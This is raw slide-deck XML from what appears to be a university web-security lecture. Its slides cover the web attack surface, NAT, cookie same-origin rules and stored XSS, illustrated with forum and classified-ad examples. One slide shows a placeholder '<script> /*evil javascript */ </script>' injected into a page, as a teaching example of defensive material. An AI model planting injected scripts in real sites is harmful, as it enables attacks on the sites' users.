        <p:spPr>
          <a:xfrm>
            <a:off y="3756338" x="7924507"/>
            <a:ext cy="1143299" cx="11753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97" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3988142" x="4811468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198" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="6610621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Authentication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199" name="Shape 199"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="7916629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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Shape 200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2787096" x="7836664"/>
            <a:ext cy="927300" cx="126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Web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201" name="Shape 201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3434605" x="6125575"/>
            <a:ext cy="999432" cx="1343249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02" name="Shape 202"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="201" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3244621" x="2458075"/>
            <a:ext cy="689700" cx="36675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y="3539498" x="2199961"/>
            <a:ext cy="566699" cx="395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4" name="Shape 204"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="201" idx="3"/>
            <a:endCxn id="196" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3934321" x="7468824"/>
            <a:ext cy="393600" cx="45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05" name="Shape 205"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="200" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="3250746" x="7412764"/>
            <a:ext cy="391800" cx="42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06" name="Shape 206"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4433998" x="7324863"/>
            <a:ext cy="559799" cx="66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07" name="Shape 207"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="201" idx="2"/>
            <a:endCxn id="198" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4434037" x="6797199"/>
            <a:ext cy="534300" cx="40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08" name="Shape 208"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="7021869"/>
            <a:ext cy="618300" cx="622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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Shape 209"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="6172864"/>
            <a:ext cy="618300" cx="744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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1000" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="1000" lang="en"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Shape 210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5097051" x="5665543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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Shape 211"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5763989" x="5847435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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Shape 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5824620" x="6817528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AND MORE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1578075" x="491625"/>
            <a:ext cy="7496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Some of you wondered how attackers or malware actually apply some of the techniques we've covered (i.e. buffer overflows, shellcode, etc...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Shape 214"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3064799" x="2192950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   +  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1000" lang="en"/>
              <a:t>NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Shape 215"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2986550" x="3822300"/>
            <a:ext cy="1646891" cx="1376460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4277025" x="454750"/>
            <a:ext cy="6143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2143425" x="5636350"/>
            <a:ext cy="6143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4633450" x="528475"/>
            <a:ext cy="1868099" cx="371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users are rarely ever directly attacked (by hackers or malware). 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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAT </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>prevents most direct attacks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Instead users face many </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>indirect attacks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Users are commonly attacked by malware hosted on malicious / hacked websites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4" name="Shape 8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5" name="Shape 8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SOP and Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody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Cookies by default allow read/write access if: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domain is the same (limited subdomain checks)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foo.bar.com -&gt;   bar.com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bar.com -&gt; foo.bar.com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Thats it!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no check on port numbers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no check on scheme (secure vs insecure)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0" name="Shape 8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1" name="Shape 8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</a:t>
            </a:r>
          </a:p>
        </p:txBody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Serious problem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since the beginning of TIME!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 LANGUAGE SPECIFIC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 WEB PLATFORMS ARE VULNERABLE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multiple variations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Stored XSS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Reflected XSS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DOM XSS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XSS in Flash/Flex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easy fix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very well known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see OWASP!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6" name="Shape 8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7" name="Shape 8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 Targets</a:t>
            </a:r>
          </a:p>
        </p:txBody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SQLi clearly targets the </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>database server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XSS can target a number of things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Usually </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>other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2" name="Shape 8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</a:t>
            </a:r>
          </a:p>
        </p:txBody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Is script injection (similar to OWASP #1 injection vulnerabilities)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usually always involves running scripts on a user's browser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Goal for attackers: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Distribute malicious scripts to other users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8" name="Shape 8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Say we have a forum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linux help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gaming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fantasy football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can post comments and posts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="891" name="Shape 8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Shape 892"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4198186" x="4356977"/>
            <a:ext cy="2213136" cx="1984932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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="893" name="Shape 893"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5607475" x="2173525"/>
            <a:ext cy="0" cx="527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894" name="Shape 8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699425" x="923000"/>
            <a:ext cy="1816099" cx="1142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Shape 895"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161738">
            <a:off y="4304076" x="6195971"/>
            <a:ext cy="446686" cx="315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www.fantasy-quidditch-league.com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9" name="Shape 8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0" name="Shape 9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XSS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="901" name="Shape 9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 attacker can post comments as well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For XSS, these comments will include malicious javascript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It will be stored like all other comments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usually as text in the database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="902" name="Shape 9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54700" x="457200"/>
            <a:ext cy="1968500" cx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Shape 9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Shape 904"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4198186" x="4356977"/>
            <a:ext cy="2213136" cx="1984932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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="905" name="Shape 905"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5607475" x="2173525"/>
            <a:ext cy="0" cx="527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06" name="Shape 906"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5339575" x="2798800"/>
            <a:ext cy="535799" cx="952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907" name="Shape 907"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5339575" x="7523200"/>
            <a:ext cy="535799" cx="952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908" name="Shape 908"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161738">
            <a:off y="4304076" x="6195971"/>
            <a:ext cy="446686" cx="315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www.fantasy-quidditch-league.com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2" name="Shape 9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XSS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody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From that point 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Any user who views that comment on a page will be attacked by that XSS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(meaning a page loads with that comment)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also if they have javascript enabled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="915" name="Shape 9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Shape 916"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4198186" x="4356977"/>
            <a:ext cy="2213136" cx="1984932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sp>
        <p:nvSpPr>
          <p:cNvPr id="917" name="Shape 917"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5339575" x="7523200"/>
            <a:ext cy="535799" cx="952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pic>
        <p:nvPicPr>
          <p:cNvPr id="918" name="Shape 9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52575" x="1310075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Shape 9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52575" x="3069049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Shape 9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5050" x="413975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Shape 9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5050" x="2203950"/>
            <a:ext cy="1816099" cx="1142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" name="Shape 922"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="917" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="4664574" x="1468900"/>
            <a:ext cy="942900" cx="60543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23" name="Shape 923"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="4505849" x="3136275"/>
            <a:ext cy="1091700" cx="4356899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24" name="Shape 924"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="917" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="5607474" x="2272900"/>
            <a:ext cy="436800" cx="52503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25" name="Shape 925"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="5617400" x="4128674"/>
            <a:ext cy="625199" cx="33645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26" name="Shape 926"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161738">
            <a:off y="4304076" x="6195971"/>
            <a:ext cy="446686" cx="315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www.fantasy-quidditch-league.com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0" name="Shape 9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1" name="Shape 9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Imagine a classified ad website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blaigslist.com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can post simple ads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="932" name="Shape 9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93714" x="512881"/>
            <a:ext cy="3174185" cx="334746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y="3731700" x="1081475"/>
            <a:ext cy="178500" cx="181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Secure Web Developer Needed!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Contact blah blah blah</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="935" name="Shape 9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Shape 936"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4198186" x="4356977"/>
            <a:ext cy="2213136" cx="1984932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sp>
        <p:nvSpPr>
          <p:cNvPr id="937" name="Shape 937"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6163275" x="2590350"/>
            <a:ext cy="357299" cx="10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SUBMIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="938" name="Shape 938"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="937" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="5607524" x="3652350"/>
            <a:ext cy="734400" cx="377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39" name="Shape 939"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161738">
            <a:off y="3923076" x="6653171"/>
            <a:ext cy="446686" cx="315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3" name="Shape 9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4" name="Shape 9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gets rendered as such:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="946" name="Shape 9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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3550800" x="3721775"/>
            <a:ext cy="3017099" cx="31958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w="1905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&lt;html&gt;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&lt;body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;h1&gt;New Classified posting&lt;/h1&gt;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&lt;h2&gt;Description&lt;/h2&gt;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&lt;hr/&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="948" name="Shape 948"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3562975" x="6540400"/>
            <a:ext cy="1171199" cx="182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949" name="Shape 949"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6520550" x="6639650"/>
            <a:ext cy="0" cx="170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950" name="Shape 950"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4485975" x="2630050"/>
            <a:ext cy="9899" cx="104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51" name="Shape 951"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4312300" x="1399375"/>
            <a:ext cy="496199" cx="17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Static content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="952" name="Shape 952"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5074750" x="3886975"/>
            <a:ext cy="426599" cx="19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Secure Web Developer  Needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="953" name="Shape 953"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="952" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="5288049" x="2411574"/>
            <a:ext cy="597300" cx="147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54" name="Shape 954"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5299475" x="956625"/>
            <a:ext cy="764100" cx="27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Dynamic (user supplied) content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="955" name="Shape 955"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161738">
            <a:off y="3923076" x="6653171"/>
            <a:ext cy="446686" cx="315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9" name="Shape 9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0" name="Shape 9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Users who view that ad see the new posting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This works fine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but it is NOT secure!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="962" name="Shape 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Shape 963"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4198186" x="4356977"/>
            <a:ext cy="2213136" cx="1984932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pic>
        <p:nvPicPr>
          <p:cNvPr id="964" name="Shape 9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52575" x="1310075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52575" x="3069049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5050" x="413975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5050" x="2203950"/>
            <a:ext cy="1816099" cx="1142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8" name="Shape 968"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="969" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="4664575" x="1468900"/>
            <a:ext cy="942900" cx="60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70" name="Shape 970"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="4505849" x="3136275"/>
            <a:ext cy="1091700" cx="435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71" name="Shape 971"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="969" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="5607475" x="2272900"/>
            <a:ext cy="436800" cx="525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72" name="Shape 972"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="5617400" x="4128674"/>
            <a:ext cy="625199" cx="336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73" name="Shape 973"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161738">
            <a:off y="3923076" x="6653171"/>
            <a:ext cy="446686" cx="315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225" name="Shape 225"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3756338" x="7924507"/>
            <a:ext cy="1143299" cx="11753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26" name="Shape 226"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3988142" x="4811468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227" name="Shape 227"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="6610621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Authentication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228" name="Shape 228"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="7916629"/>
            <a:ext cy="927300" cx="11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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Shape 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2787096" x="7836664"/>
            <a:ext cy="927300" cx="126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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1000" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="1000" lang="en"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Shape 230"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3434605" x="6125575"/>
            <a:ext cy="999432" cx="1343249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31" name="Shape 231"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="230" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3244621" x="2458075"/>
            <a:ext cy="689700" cx="36675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y="3539498" x="2199961"/>
            <a:ext cy="566699" cx="395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3" name="Shape 233"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="230" idx="3"/>
            <a:endCxn id="225" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3934321" x="7468824"/>
            <a:ext cy="393600" cx="45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34" name="Shape 234"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="229" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="3250746" x="7412764"/>
            <a:ext cy="391800" cx="42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35" name="Shape 235"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4433998" x="7324863"/>
            <a:ext cy="559799" cx="66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36" name="Shape 236"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="230" idx="2"/>
            <a:endCxn id="227" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4434037" x="6797199"/>
            <a:ext cy="534300" cx="40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37" name="Shape 237"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="7021869"/>
            <a:ext cy="618300" cx="622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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Shape 238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="6172864"/>
            <a:ext cy="618300" cx="744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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1000" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="1000" lang="en"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Shape 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5097051" x="5665543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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Shape 240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5763989" x="5847435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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Shape 241"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5824620" x="6817528"/>
            <a:ext cy="618300" cx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AND MORE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1578075" x="491625"/>
            <a:ext cy="7496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Some of you wondered how attackers or malware actually apply some of the techniques we've covered (i.e. buffer overflows, shellcode, etc...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Shape 243"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3064799" x="2192950"/>
            <a:ext cy="728399" cx="170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   +  NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Shape 244"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2986550" x="3822300"/>
            <a:ext cy="1646891" cx="1376460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4277025" x="454750"/>
            <a:ext cy="6143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1590358" x="4984966"/>
            <a:ext cy="100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servers are constantly, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>directly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>attacked by hackers.  Their goals *usually* vary from sneaking malware onto the site to target it's users, to stealing user info from the databases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y="4633450" x="528475"/>
            <a:ext cy="1868099" cx="371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SzPct val="78571"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web users are rarely ever directly attacked (by hackers or malware). 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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAT </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>prevents most direct attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="78571"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Instead users face many </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>indirect attacks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Users are commonly attacked by malware hosted on malicious / hacked websites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7" name="Shape 9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8" name="Shape 9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 Example 2</a:t>
            </a:r>
          </a:p>
        </p:txBody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 illustrate how this can go wrong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 attacker can insert &lt;html&gt; tags into his text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gets rendered with the static conent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="980" name="Shape 9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54700" x="457200"/>
            <a:ext cy="1968500" cx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Shape 9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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5091418" x="5250213"/>
            <a:ext cy="1290167" cx="1310040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000" lang="en"/>
              <a:t>Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="983" name="Shape 983"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5607475" x="2173525"/>
            <a:ext cy="0" cx="527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984" name="Shape 9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487953" x="2491626"/>
            <a:ext cy="2052697" cx="2162694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Shape 985"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161738">
            <a:off y="3923076" x="6653171"/>
            <a:ext cy="446686" cx="315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y="4724175" x="2907950"/>
            <a:ext cy="1439099" cx="160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Secure Web Developer Needed!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; /*evil javascript */ &lt;/script&gt;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0" name="Shape 9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1" name="Shape 9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XSS Example 2</a:t>
            </a:r>
          </a:p>
        </p:txBody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gets rendered as such:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="993" name="Shape 9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Shape 994"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3550800" x="3721775"/>
            <a:ext cy="3017099" cx="31958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w="1905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&lt;html&gt;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&lt;body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;h1&gt;New Classified posting&lt;/h1&gt;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&lt;h2&gt;Description&lt;/h2&gt;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&lt;hr/&gt;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&lt;script&gt; /*evil javascript */ &lt;/script&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="995" name="Shape 995"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3562975" x="6540400"/>
            <a:ext cy="1171199" cx="182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996" name="Shape 996"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
